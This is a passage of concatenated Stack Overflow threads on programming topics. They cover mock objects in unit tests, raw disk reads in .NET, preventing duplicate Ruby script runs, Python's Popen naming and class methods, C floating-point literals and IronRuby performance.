assert that all mailServer expectations are met
}
In this example, we don't really care about the PdfFormatter object so we just train it to quietly accept any call and return some sensible canned return values for all methods that sendInvitation() happens to call at this point. How did we come up with exactly this list of methods to train? We simply ran the test and kept adding the methods until the test passed. Notice, that we trained the stub to respond to a method without having a clue why it needs to call it, we simply added everything that the test complained about. We are happy, the test passes.
But what happens later, when we change sendInvitations(), or some other class that sendInvitations() uses, to create more fancy pdfs? Our test suddenly fails because now more methods of PdfFormatter are called and we didn't train our stub to expect them. And usually it's not only one test that fails in situations like this, it's any test that happens to use, directly or indirectly, the sendInvitations() method. We have to fix all those tests by adding more trainings. Also notice, that we can't remove methods no longer needed, because we don't know which of them are not needed. Again, it hinders refactoring.
Also, the readability of test suffered terribly, there's lots of code there that we didn't write because of we wanted to, but because we had to; it's not us who want that code there. Tests that use mock objects look very complex and are often difficult to read. The tests should help the reader understand, how the class under the test should be used, thus they should be simple and straightforward. If they are not readable, nobody is going to maintain them; in fact, it's easier to delete them than to maintain them.
How to fix that? Easily:
*
*Try using real classes instead of mocks whenever possible. Use the real PdfFormatterImpl. If it's not possible, change the real classes to make it possible. Not being able to use a class in tests usually points to some problems with the class. Fixing the problems is a win-win situation - you fixed the class and you have a simpler test. On the other hand, not fixing it and using mocks is a no-win situation - you didn't fix the real class and you have more complex, less readable tests that hinder further refactorings.
*Try creating a simple test implementation of the interface instead of mocking it in each test, and use this test class in all your tests. Create TestPdfFormatter that does nothing. That way you can change it once for all tests and your tests are not cluttered with lengthy setups where you train your stubs.
All in all, mock objects have their use, but when not used carefully, they often encourage bad practices, testing implementation details, hinder refactoring and produce difficult to read and difficult to maintain tests.
For some more details on shortcomings of mocks see also Mock Objects: Shortcomings and Use Cases.
A: A unit test should test a single codepath through a single method. When the execution of a method passes outside of that method, into another object, and back again, you have a dependency.
When you test that code path with the actual dependency, you are not unit testing; you are integration testing. While that's good and necessary, it isn't unit testing.
If your dependency is buggy, your test may be affected in such a way to return a false positive. For instance, you may pass the dependency an unexpected null, and the dependency may not throw on null as it is documented to do. Your test does not encounter a null argument exception as it should have, and the test passes.
Also, you may find its hard, if not impossible, to reliably get the dependent object to return exactly what you want during a test. That also includes throwing expected exceptions within tests.
A mock replaces that dependency. You set expectations on calls to the dependent object, set the exact return values it should give you to perform the test you want, and/or what exceptions to throw so that you can test your exception handling code. In this way you can test the unit in question easily.
TL;DR: Mock every dependency your unit test touches.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38181",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "179"
} |
Q: Any data-driven open source JEE5 EJB3+JSF Sample Project out there? I am looking for an open source project that uses EJB3 as backend and JSF as frontend. It should not be a tutorial but a real application that real people are using.
The application should be data-driven, i.e. the following aspects are fundamental and make 80% or more of the application.
*
*form-based (many input forms)
*table views, master/detail, etc.
*CRUD (create/read/update/delete)-Operations have been implemented
*support for relations: 1:1, 1:n
*JPA Entity Beans + EJB 3 Stateless Session Beans for Facade
*no JBoss Seam
Typical applications are CRM / ERP projects where people work a lot with lists, tables, and forms. But any other "administrative" application should be OK, too.
I know petstore, but that application isn't form-based. petstore is a end-user application. I am looking for backend-user applications.
Something like Microsofts AdventureWorks series, but with EJB3+JSF...
Something like SugarCRM, but with EJB3+JSF...
I've googled a lot... with no results :-(
*
*@Matthew: the samples provided with NetBeans are too simple.
*@JB: It should be a real application. Not a "how to do EJB+JSF" application.
*@50-50: voted down because of seam
*@Kariem: I can't use seam, AppFuse hasn't EJB Session Beans
A: Seam examples are quite good. They are stand-alone projects, that you may deploy out of the box.
A: I feel your pain, this is not an answer, as much as an observation that the Java World in general suffers from the lack of good applications that go beyond the tutorial. Some of the sample .NET applications are very good and show interesting techniques, while solving small enough problems that the novice can wrap their heads around the entire application and see "real code" doing "real things".
I have not looked at the Seam examples, so they may well be an exception, but having sample applications, particularly the CRUD, Query, Report style back office applications you're talking about, are a great help to folks and I wish there were more in the Java community.
A: You might poke around at these real world JSF apps and see if any of them have their source available: RealWorldJsfLinks
A: I am not sure is it 100% what your looking for, but check out the built in example that comes packaged with NetBeans 6.1. It uses JSF/EJB3/ApacheDerby. I played around with it for like 20 minutes and thought it was pretty cool as a simple/starter JavaEE application to learn from.
A: I have to second jb's comment: The seam examples are great and can be put to use. The Seam Homepage uses the Seam Wiki from the examples (that application alone fulfills all the outlined criteria). Other examples in the distribution: Hotel Booking, DVD Store, and a Blog. The documentation contains quite some information on the special parts of the examples.
The "problem" might be that Seam covers a lot of the details you'd usually have to do in a traditional EJB3/JSF application. You might want to have a look at AppFuse or AppFuse Light. They have one application with examples using different technologies, including EJB3 (JPA only) and JSF. The examples are not as sophisticated (don't really fulfill your criteria), but contain a lot of useful stuff.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38183",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: How do I read a disk directly with .NET? Is it possible to read a disk directly with .NET? By directly, I mean via the device bypassing the file system. I think I would go about this by opening the device some way "\Device\Ide\IdeDeviceP2T0L0-1" for example.
If I can't open the device with a .NET API, knowing which Win32 API to use would be helpful.
A: CreateFile has support for direct disk access. Read the notes under "Physical Disks and Volumes". You should be able to P/Invoke the call.
Note that Vista and Server 2008 have severely restricted this.
A: Cool, thank you Mark, I had forgotten that CreateFile opens things too. I was looking at the volume management API and not seeing how to open things.
Here is a little class that wraps things up. It might also be possible/correct to just pass the SafeFileHandle into a FileStream.
using System;
using System.Runtime.InteropServices;
using System.IO;
using Microsoft.Win32.SafeHandles;
namespace ReadFromDevice
{
public class DeviceStream : Stream, IDisposable
{
public const short FILE_ATTRIBUTE_NORMAL = 0x80;
public const short INVALID_HANDLE_VALUE = -1;
public const uint GENERIC_READ = 0x80000000;
public const uint GENERIC_WRITE = 0x40000000;
public const uint CREATE_NEW = 1;
public const uint CREATE_ALWAYS = 2;
public const uint OPEN_EXISTING = 3;
// Use interop to call the CreateFile function.
// For more information about CreateFile,
// see the unmanaged MSDN reference library.
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
private static extern IntPtr CreateFile(string lpFileName, uint dwDesiredAccess,
uint dwShareMode, IntPtr lpSecurityAttributes, uint dwCreationDisposition,
uint dwFlagsAndAttributes, IntPtr hTemplateFile);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool ReadFile(
IntPtr hFile, // handle to file
byte[] lpBuffer, // data buffer
int nNumberOfBytesToRead, // number of bytes to read
ref int lpNumberOfBytesRead, // number of bytes read
IntPtr lpOverlapped
//
// ref OVERLAPPED lpOverlapped // overlapped buffer
);
private SafeFileHandle handleValue = null;
private FileStream _fs = null;
public DeviceStream(string device)
{
Load(device);
}
private void Load(string Path)
{
if (string.IsNullOrEmpty(Path))
{
throw new ArgumentNullException("Path");
}
// Try to open the file.
IntPtr ptr = CreateFile(Path, GENERIC_READ, 0, IntPtr.Zero, OPEN_EXISTING, 0, IntPtr.Zero);
handleValue = new SafeFileHandle(ptr, true);
_fs = new FileStream(handleValue, FileAccess.Read);
// If the handle is invalid,
// get the last Win32 error
// and throw a Win32Exception.
if (handleValue.IsInvalid)
{
Marshal.ThrowExceptionForHR(Marshal.GetHRForLastWin32Error());
}
}
public override bool CanRead
{
get { return true; }
}
public override bool CanSeek
{
get { return false; }
}
public override bool CanWrite
{
get { return false; }
}
public override void Flush()
{
return;
}
public override long Length
{
get { return -1; }
}
public override long Position
{
get
{
throw new NotImplementedException();
}
set
{
throw new NotImplementedException();
}
}
/// <summary>
/// </summary>
/// <param name="buffer">An array of bytes. When this method returns, the buffer contains the specified byte array with the values between offset and
/// (offset + count - 1) replaced by the bytes read from the current source. </param>
/// <param name="offset">The zero-based byte offset in buffer at which to begin storing the data read from the current stream. </param>
/// <param name="count">The maximum number of bytes to be read from the current stream.</param>
/// <returns></returns>
public override int Read(byte[] buffer, int offset, int count)
{
int BytesRead =0;
var BufBytes = new byte[count];
if (!ReadFile(handleValue.DangerousGetHandle(), BufBytes, count, ref BytesRead, IntPtr.Zero))
{
Marshal.ThrowExceptionForHR(Marshal.GetHRForLastWin32Error());
}
for (int i = 0; i < BytesRead; i++)
{
buffer[offset + i] = BufBytes[i];
}
return BytesRead;
}
public override int ReadByte()
{
int BytesRead = 0;
var lpBuffer = new byte[1];
if (!ReadFile(
handleValue.DangerousGetHandle(), // handle to file
lpBuffer, // data buffer
1, // number of bytes to read
ref BytesRead, // number of bytes read
IntPtr.Zero
))
{ Marshal.ThrowExceptionForHR(Marshal.GetHRForLastWin32Error()); ;}
return lpBuffer[0];
}
public override long Seek(long offset, SeekOrigin origin)
{
throw new NotImplementedException();
}
public override void SetLength(long value)
{
throw new NotImplementedException();
}
public override void Write(byte[] buffer, int offset, int count)
{
throw new NotImplementedException();
}
public override void Close()
{
handleValue.Close();
handleValue.Dispose();
handleValue = null;
base.Close();
}
private bool disposed = false;
new void Dispose()
{
Dispose(true);
base.Dispose();
GC.SuppressFinalize(this);
}
private new void Dispose(bool disposing)
{
// Check to see if Dispose has already been called.
if (!this.disposed)
{
if (disposing)
{
if (handleValue != null)
{
_fs.Dispose();
handleValue.Close();
handleValue.Dispose();
handleValue = null;
}
}
// Note disposing has been done.
disposed = true;
}
}
}
}
And an example of using the class
static void Main(string[] args)
{
var reader = new BinaryReader(new DeviceStream(@"\\.\PhysicalDrive3"));
var writer = new BinaryWriter(new FileStream(@"g:\test.dat", FileMode.Create));
var buffer = new byte[MB];
int count;
int loopcount=0;
try{
while((count=reader.Read(buffer,0,MB))>0)
{
writer.Write(buffer,0,count);
System.Console.Write('.');
if(loopcount%100==0)
{
System.Console.WriteLine();
System.Console.WriteLine("100MB written");
writer.Flush();
}
loopcount++;
}
}
catch(Exception e)
{
Console.WriteLine(e.Message);
}
reader.Close();
writer.Flush();
writer.Close();
}
Standard disclaimers apply, this code may be hazardous to your health.
A: Agree with Mark's answer. Note that if User Account Control is enabled (which is the default on Windows Vista and higher), your program must be running elevated (with Administrative privileges). If your program is just used for only a few users, you can request the user to right-click the executable files and choose "Run as Administrator". Otherwise, you can compile a manifest file into the program, and in the manifest, specify that the program needs to be run elevated (search for "requestedExecutionLevel requireAdministrator" to get more information).
A: In .NET 5, you can use the FileStream method to read a file on the disk.
new FileStream(@"\\.\PhysicalDrive1", FileMode.Open, FileAccess.Read, FileShare.ReadWrite)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38190",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: Determine if a ruby script is already running Is there an easy way to tell if a ruby script is already running and then handle it appropriately? For example: I have a script called really_long_script.rb. I have it cronned to run every 5 minutes. When it runs, I want to see if the previous run is still running and then stop the execution of the second script. Any ideas?
A: The ps is a really poor way of doing that and probably open to race conditions.
The traditional Unix/Linux way would be to write the PID to a file (typically in /var/run) and check to see if that file exists on startup.
e.g. the pidfile being located at /var/run/myscript.pid then you'd check to see if that exists before running the program. There are a few tricks to avoid race conditions involving using O_EXCL (exclusing locking) to open the file and symbolic links.
However unlikely, you should try to code to avoid race conditions by using atomic operations on the filesystem.
To save re-inventing the wheel, you might want to look at http://rubyforge.org/projects/pidify/
A: Highlander
Description
A gem that ensures only one instance of your main script is running.
In short, there can be only one.
Installation
gem install highlander
Synopsis
require 'highlander' # This should be the -first- thing in your code.
# Your code here
Meanwhile, back on the command line...
# First attempt, works. Assume it's running in the background.
ruby your_script.rb
# Second attempt while the first instance is still running, fails.
ruby your_script.rb # => RuntimeError
Notes
Simply requiring the highlander gem ensures that only one instance
of that script cannot be started again. If you try to start it again
it will raise a RuntimeError.
A: You should probably also check that the process is actually running, so that if your script dies without cleaning itself up, it will run the next time rather than simply checking that
/var/run/foo.pid exists and exiting.
A: In bash:
if ps aux | grep really_long_script.rb | grep -vq grep
then
echo Script already running
else
ruby really_long_script.rb
fi
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38193",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Why is the subprocess.Popen class not named Subprocess? The primary class in the subprocess module is name Popen, and represents a subprocess. Popen sounds like someone was trying to force the name to follow some function naming format, rather than chosing a name that actually represents what the object is. Does anyone know why it was chosen over something simple like, say, Subprocess?
A: Now, I'm not saying that this is the greatest name in the world, but here was the idea as I understand it.
Originally, the popen family was in the os module and was an implementation of the venerable posix popen. The movement to the subprocess module would have been an opportune time to rename them, but I guess that keeping Popen makes it easier to find in the docs for those who have a long history with python or even to the venerable posix functions.
From its earliest posix incarnation, Popen has always been meant to open a Process and allow you to read and write from its stdio like a file. Thus the mnemonic for Popen is that it is short for ProcessOpen in an attempt to kind of, sorta, look like open.
A: subprocess.Popen replaces the group of os.popenX POSIX functions (which have a long history). I suppose that the name Popen makes it more likely for people used to the old functions to find and use the new ones.
The PEP for subprocess (PEP 324) has a little bit of discussion on the name of the module but not of class Popen. The list of PEPs (Python enhancement proposals) is in general an excellent place to start if you're looking for the rationale for features of Python.
A: I suppose the name was chosen because the functionality subprocess is replacing was formerly in the os module as the os.popen function. There could be even ways to automate migration between the two.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38197",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Why does this C code produce a double instead of a float? celsius = (5.0/9.0) * (fahr-32.0);
Is it just a development choice that the C developers decided upon or is there a reason to this? I believe a float is smaller than a double, so it might be to prevent overflows caused by not knowing what decimal format to use. Is that the reason, or am I overlooking something?
A: I think the reason is to ensure that any result can be encompassed. so the natural choice is double as it is the largest data type.
A: The reason that the expression is cast to double-precision is because the literals specified are double-precision values by default. If you specify the literals used in the equation as floats, the expression will return a float. Consider the following code (Mac OS X using gcc 4.01).
#include <stdio.h>
int main() {
float celsius;
float fahr = 212;
printf("sizeof(celsius) ---------------------> %d\n", sizeof(celsius));
printf("sizeof(fahr) ------------------------> %d\n", sizeof(fahr));
printf("sizeof(double) ----------------------> %d\n", sizeof(double));
celsius = (5.0f/9.0f) * (fahr-32.0f);
printf("sizeof((5.0f/9.0f) * (fahr-32.0f)) --> %d\n", sizeof((5.0f/9.0f) * (fahr-32.0f)));
printf("sizeof((5.0/9.0) * (fahr-32.0)) -----> %d\n", sizeof((5.0/9.0) * (fahr-32.0)));
printf("celsius -----------------------------> %f\n", celsius);
}
Output is:
sizeof(celsius) ---------------------> 4
sizeof(fahr) ------------------------> 4
sizeof(double) ----------------------> 8
sizeof((5.0f/9.0f) * (fahr-32.0f)) --> 4
sizeof((5.0/9.0) * (fahr-32.0)) -----> 8
celsius -----------------------------> 100.000008
A: celsius = (5.0/9.0) * (fahr-32.0);
In this expression, 5.0, 9.0, and 32.0 are doubles. That's the default type for a floating-point constant - if you wanted them to be floats, then you would use the F suffix:
celsius = (5.0F/9.0F) * (fahr-32.0F);
Note that if fahr was a double, then the result of this last expression would still be a double: as Vaibhav noted, types are promoted in such a way as to avoid potentially losing precision.
A: Floating point constants should have the available highest precision. The result can be assigned to a float without undue trouble.
A: Back in the day of K&Rv1, it was encouraged to use float/double interchangeably being as all expressions with floating-point types were always evaluated using `double' representation, a problem in cases where efficency is paramount. A floating-point constant without an f, F, l, or L suffixed is of type double. And, if the letter f or F is the suffix, the constant is of type float. And if suffixed by the letter l or L, it is of type long double.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38198",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: IronRuby performance? While I know IronRuby isn't quite ready for the world to use it, I was wondering if anyone here tried it and tested how well it faired against the other Rubies out there in terms of raw performance?
If so, what are the results, and how did you go about measuring the performance (which benchmarks etc)?
Edit: The IronRuby team maintains a site on how they compare to Ruby MRI 1.8 at http://ironruby.info/. Below the spec pass rate table, they also have some information on how IronRuby performs on these specs. This table is not continuously updated, but I assume they update it often enough (you can see the last update at the top of the page).
A: Antonio Cangiano just published some new benchmarks (August 09), IronRuby seems to be faster across that board than MRI under Windows. John Lam and co have done a fantastic job and are not done optimising.
A: According to this article http://www.iunknown.com/2008/05/ironruby-and-rails.html. In may performance was nowhere near where they expected it to be. I heard in http://altnetpodcast.com/episodes/9-state-of-ironruby (3 days ago) that they're still working on performance. I guess they put compatability first and are now trying to get the performance up to par with other ruby implementations out there.
As far as I understand they're not nearly as performant as Iron Python that is developed by the same team. I don't know if this is because Iron Ruby is using the DLR a lot more and that still needs to be optimized or if they need to optimize the Iron Ruby implementation itself more. But I guess it is good news because they can get it a lot faster. So if you're already happy with performance you'll get a lot happier.
A: The load time and the memory utilization are still the two weakest points in IronRuby. Once a particular piece of code has been loaded and is running in a sort of steady-state mode -- that is, little to no new source is being evaluated -- then the performance should be quite good.
To answer your specific question, consider this data.
A: I have used it and it has worked great for what I have done. However my measuring of performance isn't really scientific, because it was all visual. However I did notice that IronRuby seemed a little more snappier when I compared the two program on equal tasks. I really think this had to do more with the strong and tight binding with IIS that .NET has more than the speed of the framework.
But I could totally be wrong, because I didn't really stress my applications to the levels that Twitter might see. But from my .NET experience I know it would hold up just as well if not better than current production Ruby applications.
By the way I tested Ruby using FastCGI under IIS.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38235",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: What is the purpose of class methods? I'm teaching myself Python and my most recent lesson was that Python is not Java, and so I've just spent a while turning all my Class methods into functions.
I now realise that I don't need to use Class methods for what I would done with static methods in Java, but now I'm not sure when I would use them. All the advice I can find about Python Class methods is along the lines of newbies like me should steer clear of them, and the standard documentation is at its most opaque when discussing them.
Does anyone have a good example of using a Class method in Python or at least can someone tell me when Class methods can be sensibly used?
A: Factory methods (alternative constructors) are indeed a classic example of class methods.
Basically, class methods are suitable anytime you would like to have a method which naturally fits into the namespace of the class, but is not associated with a particular instance of the class.
As an example, in the excellent unipath module:
Current directory
*
*Path.cwd()
*
*Return the actual current directory; e.g., Path("/tmp/my_temp_dir"). This is a class method.
*.chdir()
*
*Make self the current directory.
As the current directory is process wide, the cwd method has no particular instance with which it should be associated. However, changing the cwd to the directory of a given Path instance should indeed be an instance method.
Hmmm... as Path.cwd() does indeed return a Path instance, I guess it could be considered to be a factory method...
A: Honestly? I've never found a use for staticmethod or classmethod. I've yet to see an operation that can't be done using a global function or an instance method.
It would be different if python used private and protected members more like Java does. In Java, I need a static method to be able to access an instance's private members to do stuff. In Python, that's rarely necessary.
Usually, I see people using staticmethods and classmethods when all they really need to do is use python's module-level namespaces better.
A: Think about it this way: normal methods are useful to hide the details of dispatch: you can type myobj.foo() without worrying about whether the foo() method is implemented by the myobj object's class or one of its parent classes. Class methods are exactly analogous to this, but with the class object instead: they let you call MyClass.foo() without having to worry about whether foo() is implemented specially by MyClass because it needed its own specialized version, or whether it is letting its parent class handle the call.
Class methods are essential when you are doing set-up or computation that precedes the creation of an actual instance, because until the instance exists you obviously cannot use the instance as the dispatch point for your method calls. A good example can be viewed in the SQLAlchemy source code; take a look at the dbapi() class method at the following link:
https://github.com/zzzeek/sqlalchemy/blob/ab6946769742602e40fb9ed9dde5f642885d1906/lib/sqlalchemy/dialects/mssql/pymssql.py#L47
You can see that the dbapi() method, which a database backend uses to import the vendor-specific database library it needs on-demand, is a class method because it needs to run before instances of a particular database connection start getting created — but that it cannot be a simple function or static function, because they want it to be able to call other, supporting methods that might similarly need to be written more specifically in subclasses than in their parent class. And if you dispatch to a function or static class, then you "forget" and lose the knowledge about which class is doing the initializing.
A: I used to work with PHP and recently I was asking myself, whats going on with this classmethod? Python manual is very technical and very short in words so it wont help with understanding that feature. I was googling and googling and I found answer -> http://code.anjanesh.net/2007/12/python-classmethods.html.
If you are lazy to click it. My explanation is shorter and below. :)
in PHP (maybe not all of you know PHP, but this language is so straight forward that everybody should understand what I'm talking about) we have static variables like this:
class A
{
static protected $inner_var = null;
static public function echoInnerVar()
{
echo self::$inner_var."\n";
}
static public function setInnerVar($v)
{
self::$inner_var = $v;
}
}
class B extends A
{
}
A::setInnerVar(10);
B::setInnerVar(20);
A::echoInnerVar();
B::echoInnerVar();
The output will be in both cases 20.
However in python we can add @classmethod decorator and thus it is possible to have output 10 and 20 respectively. Example:
class A(object):
inner_var = 0
@classmethod
def setInnerVar(cls, value):
cls.inner_var = value
@classmethod
def echoInnerVar(cls):
print cls.inner_var
class B(A):
pass
A.setInnerVar(10)
B.setInnerVar(20)
A.echoInnerVar()
B.echoInnerVar()
Smart, ain't?
A: Class methods provide a "semantic sugar" (don't know if this term is widely used) - or "semantic convenience".
Example: you got a set of classes representing objects. You might want to have the class method all() or find() to write User.all() or User.find(firstname='Guido'). That could be done using module level functions of course...
A: if you are not a "programmer by training", this should help:
I think I have understood the technical explanations above and elsewhere on the net, but I was always left with a question "Nice, but why do I need it? What is a practical, use case?". and now life gave me a good example that clarified all:
I am using it to control the global-shared variable that is shared among instances of a class instantiated by multi-threading module. in humane language, I am running multiple agents that create examples for deep learning IN PARALLEL. (imagine multiple players playing ATARI game at the same time and each saving the results of their game to one common repository (the SHARED VARIABLE))
I instantiate the players/agents with the following code (in Main/Execution Code):
a3c_workers = [A3C_Worker(self.master_model, self.optimizer, i, self.env_name, self.model_dir) for i in range(multiprocessing.cpu_count())]
*
*it creates as many players as there are processor cores on my comp
A3C_Worker - is a class that defines the agent
a3c_workers - is a list of the instances of that class (i.e. each instance is one player/agent)
now i want to know how many games have been played across all players/agents thus within the A3C_Worker definition I define the variable to be shared across all instances:
class A3C_Worker(threading.Thread):
global_shared_total_episodes_across_all_workers = 0
now as the workers finish their games they increase that count by 1 each for each game finished
at the end of my example generation i was closing the instances but the shared variable had assigned the total number of games played. so when I was re-running it again my initial total number of episodes was that of the previous total. but i needed that count to represent that value for each run individually
to fix that i specified :
class A3C_Worker(threading.Thread):
@classmethod
def reset(cls):
A3C_Worker.global_shared_total_episodes_across_all_workers = 0
than in the execution code i just call:
A3C_Worker.reset()
note that it is a call to the CLASS overall not any INSTANCE of it individually. thus it will set my counter to 0 for every new agent I initiate from now on.
using the usual method definition def play(self):, would require us to reset that counter for each instance individually, which would be more computationally demanding and difficult to track.
A: What just hit me, coming from Ruby, is that a so-called class method and a so-called instance method is just a function with semantic meaning applied to its first parameter, which is silently passed when the function is called as a method of an object (i.e. obj.meth()).
Normally that object must be an instance but the @classmethod method decorator changes the rules to pass a class. You can call a class method on an instance (it's just a function) - the first argument will be its class.
Because it's just a function, it can only be declared once in any given scope (i.e. class definition). If follows therefore, as a surprise to a Rubyist, that you can't have a class method and an instance method with the same name.
Consider this:
class Foo():
def foo(x):
print(x)
You can call foo on an instance
Foo().foo()
<__main__.Foo instance at 0x7f4dd3e3bc20>
But not on a class:
Foo.foo()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: unbound method foo() must be called with Foo instance as first argument (got nothing instead)
Now add @classmethod:
class Foo():
@classmethod
def foo(x):
print(x)
Calling on an instance now passes its class:
Foo().foo()
__main__.Foo
as does calling on a class:
Foo.foo()
__main__.Foo
It's only convention that dictates that we use self for that first argument on an instance method and cls on a class method. I used neither here to illustrate that it's just an argument. In Ruby, self is a keyword.
Contrast with Ruby:
class Foo
def foo()
puts "instance method #{self}"
end
def self.foo()
puts "class method #{self}"
end
end
Foo.foo()
class method Foo
Foo.new.foo()
instance method #<Foo:0x000000020fe018>
The Python class method is just a decorated function and you can use the same techniques to create your own decorators. A decorated method wraps the real method (in the case of @classmethod it passes the additional class argument). The underlying method is still there, hidden but still accessible.
footnote: I wrote this after a name clash between a class and instance method piqued my curiosity. I am far from a Python expert and would like comments if any of this is wrong.
A: I recently wanted a very light-weight logging class that would output varying amounts of output depending on the logging level that could be programmatically set. But I didn't want to instantiate the class every time I wanted to output a debugging message or error or warning. But I also wanted to encapsulate the functioning of this logging facility and make it reusable without the declaration of any globals.
So I used class variables and the @classmethod decorator to achieve this.
With my simple Logging class, I could do the following:
Logger._level = Logger.DEBUG
Then, in my code, if I wanted to spit out a bunch of debugging information, I simply had to code
Logger.debug( "this is some annoying message I only want to see while debugging" )
Errors could be out put with
Logger.error( "Wow, something really awful happened." )
In the "production" environment, I can specify
Logger._level = Logger.ERROR
and now, only the error message will be output. The debug message will not be printed.
Here's my class:
class Logger :
''' Handles logging of debugging and error messages. '''
DEBUG = 5
INFO = 4
WARN = 3
ERROR = 2
FATAL = 1
_level = DEBUG
def __init__( self ) :
Logger._level = Logger.DEBUG
@classmethod
def isLevel( cls, level ) :
return cls._level >= level
@classmethod
def debug( cls, message ) :
if cls.isLevel( Logger.DEBUG ) :
print "DEBUG: " + message
@classmethod
def info( cls, message ) :
if cls.isLevel( Logger.INFO ) :
print "INFO : " + message
@classmethod
def warn( cls, message ) :
if cls.isLevel( Logger.WARN ) :
print "WARN : " + message
@classmethod
def error( cls, message ) :
if cls.isLevel( Logger.ERROR ) :
print "ERROR: " + message
@classmethod
def fatal( cls, message ) :
if cls.isLevel( Logger.FATAL ) :
print "FATAL: " + message
And some code that tests it just a bit:
def logAll() :
Logger.debug( "This is a Debug message." )
Logger.info ( "This is a Info message." )
Logger.warn ( "This is a Warn message." )
Logger.error( "This is a Error message." )
Logger.fatal( "This is a Fatal message." )
if __name__ == '__main__' :
print "Should see all DEBUG and higher"
Logger._level = Logger.DEBUG
logAll()
print "Should see all ERROR and higher"
Logger._level = Logger.ERROR
logAll()
A: Alternative constructors are the classic example.
A: Class methods are for when you need to have methods that aren't specific to any particular instance, but still involve the class in some way. The most interesting thing about them is that they can be overridden by subclasses, something that's simply not possible in Java's static methods or Python's module-level functions.
If you have a class MyClass, and a module-level function that operates on MyClass (factory, dependency injection stub, etc), make it a classmethod. Then it'll be available to subclasses.
A: This is an interesting topic. My take on it is that python classmethod operates like a singleton rather than a factory (which returns a produced an instance of a class). The reason it is a singleton is that there is a common object that is produced (the dictionary) but only once for the class but shared by all instances.
To illustrate this here is an example. Note that all instances have a reference to the single dictionary. This is not Factory pattern as I understand it. This is probably very unique to python.
class M():
@classmethod
def m(cls, arg):
print "arg was", getattr(cls, "arg" , None),
cls.arg = arg
print "arg is" , cls.arg
M.m(1) # prints arg was None arg is 1
M.m(2) # prints arg was 1 arg is 2
m1 = M()
m2 = M()
m1.m(3) # prints arg was 2 arg is 3
m2.m(4) # prints arg was 3 arg is 4 << this breaks the factory pattern theory.
M.m(5) # prints arg was 4 arg is 5
A: I was asking myself the same question few times. And even though the guys here tried hard to explain it, IMHO the best answer (and simplest) answer I have found is the description of the Class method in the Python Documentation.
There is also reference to the Static method. And in case someone already know instance methods (which I assume), this answer might be the final piece to put it all together...
Further and deeper elaboration on this topic can be found also in the documentation:
The standard type hierarchy (scroll down to Instance methods section)
A: It allows you to write generic class methods that you can use with any compatible class.
For example:
@classmethod
def get_name(cls):
print cls.name
class C:
name = "tester"
C.get_name = get_name
#call it:
C.get_name()
If you don't use @classmethod you can do it with self keyword but it needs an instance of Class:
def get_name(self):
print self.name
class C:
name = "tester"
C.get_name = get_name
#call it:
C().get_name() #<-note the its an instance of class C
A: I think the most clear answer is AmanKow's one. It boils down to how u want to organize your code. You can write everything as module level functions which are wrapped in the namespace of the module i.e
module.py (file 1)
---------
def f1() : pass
def f2() : pass
def f3() : pass
usage.py (file 2)
--------
from module import *
f1()
f2()
f3()
def f4():pass
def f5():pass
usage1.py (file 3)
-------------------
from usage import f4,f5
f4()
f5()
The above procedural code is not well organized, as you can see after only 3 modules it gets confusing, what is each method do ? You can use long descriptive names for functions(like in java) but still your code gets unmanageable very quick.
The object oriented way is to break down your code into manageable blocks i.e Classes & objects and functions can be associated with objects instances or with classes.
With class functions you gain another level of division in your code compared with module level functions.
So you can group related functions within a class to make them more specific to a task that you assigned to that class. For example you can create a file utility class :
class FileUtil ():
def copy(source,dest):pass
def move(source,dest):pass
def copyDir(source,dest):pass
def moveDir(source,dest):pass
//usage
FileUtil.copy("1.txt","2.txt")
FileUtil.moveDir("dir1","dir2")
This way is more flexible and more maintainable, you group functions together and its more obvious to what each function do. Also you prevent name conflicts, for example the function copy may exist in another imported module(for example network copy) that you use in your code, so when you use the full name FileUtil.copy() you remove the problem and both copy functions can be used side by side.
A: When a user logs in on my website, a User() object is instantiated from the username and password.
If I need a user object without the user being there to log in (e.g. an admin user might want to delete another users account, so i need to instantiate that user and call its delete method):
I have class methods to grab the user object.
class User():
#lots of code
#...
# more code
@classmethod
def get_by_username(cls, username):
return cls.query(cls.username == username).get()
@classmethod
def get_by_auth_id(cls, auth_id):
return cls.query(cls.auth_id == auth_id).get()
A: @classmethod can be useful for easily instantiating objects of that class from outside resources. Consider the following:
import settings
class SomeClass:
@classmethod
def from_settings(cls):
return cls(settings=settings)
def __init__(self, settings=None):
if settings is not None:
self.x = settings['x']
self.y = settings['y']
Then in another file:
from some_package import SomeClass
inst = SomeClass.from_settings()
Accessing inst.x will give the same value as settings['x'].
A: A class defines a set of instances, of course. And the methods of a class work on the individual instances. The class methods (and variables) a place to hang other information that is related to the set of instances over all.
For example if your class defines a the set of students you might want class variables or methods which define things like the set of grade the students can be members of.
You can also use class methods to define tools for working on the entire set. For example Student.all_of_em() might return all the known students. Obviously if your set of instances have more structure than just a set you can provide class methods to know about that structure. Students.all_of_em(grade='juniors')
Techniques like this tend to lead to storing members of the set of instances into data structures that are rooted in class variables. You need to take care to avoid frustrating the garbage collection then.
A: Classes and Objects concepts are very useful in organizing things. It's true that all the operations that can be done by a method can also be done using a static function.
Just think of a scenario, to build a Students Databases System to maintain student details.
You need to have details about students, teachers and staff. You need to build functions to calculate fees, salary, marks, etc. Fees and marks are only applicable for students, salary is only applicable for staff and teachers. So if you create separate classes for every type of people, the code will be organized.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38238",
"timestamp": "2023-03-29T00:00:00",
